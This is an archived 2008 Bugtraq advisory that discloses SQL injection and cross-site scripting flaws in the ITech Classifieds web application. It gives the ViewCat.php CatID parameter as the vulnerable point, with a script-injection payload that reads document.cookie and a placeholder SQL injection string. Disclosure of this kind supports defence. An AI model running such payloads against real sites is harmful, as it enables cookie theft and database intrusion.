[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ITech Classifieds Multiple Remote Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ITech Classifieds Multiple Remote Vulnerabilities
From: cybermilitan@xxxxxxxxxxx
Date: 1 Feb 2008 22:51:54 -0000

Title  : ITech Classifieds Multiple Remote Vulnerabilities

Author : Crackers_Child

Bug    : SQL Injection + XSS

Demo   : http://itechclassifieds.com/demo/

Exp    : /ViewCat.php?CatID=<script>Alert(document.cookie)</script>

Exp    : /ViewCat.php?CatID=SQL Injection /*

Greetz :   www.aq.com     www.sibersavascilar.com    www.biyofrm.com

Prev by Date: Domain Trader v2.0 Xss Vulnerable
Next by Date: [ MDVSA-2008:033 ] - Updated ruby-gnome2 packages fix arbitrary code execution vulnerability
Previous by thread: Domain Trader v2.0 Xss Vulnerable
Next by thread: [ MDVSA-2008:033 ] - Updated ruby-gnome2 packages fix arbitrary code execution vulnerability
Index(es):
- Date
- Thread